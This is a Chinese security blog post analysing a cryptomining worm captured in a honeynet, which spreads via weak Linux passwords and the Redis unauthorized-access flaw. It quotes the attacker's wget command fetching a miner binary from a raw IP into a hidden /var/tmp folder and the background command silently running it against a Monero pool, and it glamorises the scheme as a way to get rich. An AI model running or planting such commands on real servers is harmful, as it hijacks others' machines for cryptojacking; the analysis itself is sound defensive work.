余弦:蠕虫挖矿一例,无码

技术 作者:余弦 2017-03-15 08:46:14
给大家分享网络空间里发家致富的一个野路子:蠕虫挖矿,套比特币等虚拟货币。下面这是我们捕获到的真实案例,门开了一条缝,更多的请自行探索,以免有带坏嫌疑。 ----------------- 今天凌晨,我们的蜜网系统跳出了个有趣的字符串:
zaxa2aq@protonmail.com
ProtonMail!前段时间我们的分享(推荐安全且匿名的邮箱 ProtonMail)似乎暗示着某种巧合,这不得不引起我们的兴趣。意料之内,匿名是把双刃剑,剑的另一端,“匿名之恶”会让人性丑恶发挥到极致。 以前我说过,黑暗森林法则同样适用于这个网络空间:被发现即被干掉。不好意思,这次是我们“干掉”了对方。 上面这个字符串完整内容是:
(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &)
我简单解释下这条 Bash 命令:
exec,负责执行后面的命令,细节用途自行查阅。 /var/tmp/.war/1,这个文件由下面这条命令创建: wget 95.128.182.166/javascri -O /var/tmp/.war/1 1 == minerd minerd 之后的参数: -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x 目测和比特币等这类货币的挖矿有关,因为:minergate.com 就是这样的邪恶挖矿大平台。合法存在。 &> /dev/null 无视标准输出与错误输出。 最后的 &,表示这条命令放到后台执行。 最外层的小括号(),表示创建一个新的 Shell。
上面的7点解释,重点看第4点就好。 为了确定我们的“目测”,我们用我们唯一的官方邮箱“lant34m@protonmail.com”同样在 minergate.com 上注册了个账号。在这个平台深度体验一番,不得不感慨,挖矿的世界真是眼花缭乱,满地宝藏既视感。 这个平台上,我们发现下面这个挖矿说明链接:
Smart multicurrency mining pool & 1-click GUI miner
部分区域截图如下: 红框里的内容是:
minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u lant34m@protonmail.com -p x
对比下上面的第4点,这下确定了吧?另外,这个 minerd 本身还是开源的...你可以根据自己的特殊要求修改编译。 好,回到开头,这个蠕虫其实不是什么新鲜玩意,传播的主要方式是通过 Linux 服务器的弱口令及一些漏洞(比如:Redis 那个未授权访问缺陷)。 这个蠕虫感染一万台服务器,那么就有一万个挖矿节点... 别说运用什么 0day,就是用到一些上古时代的技术,我们也能在这个健壮又脆弱的网络空间里成为“有钱人”。 还好,我们不是坏人。 ----------------- 这个案例够清晰吧?还想看到更多的吗?经过“懒人在思考”的白话润色,保证你即使不懂技术,也能涨姿势。 网络空间,这个巨型大脑,真美... ----------------- 微信公众号「Lazy-Thought」 几个黑客在维护,都很懒,都想改变点什么

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接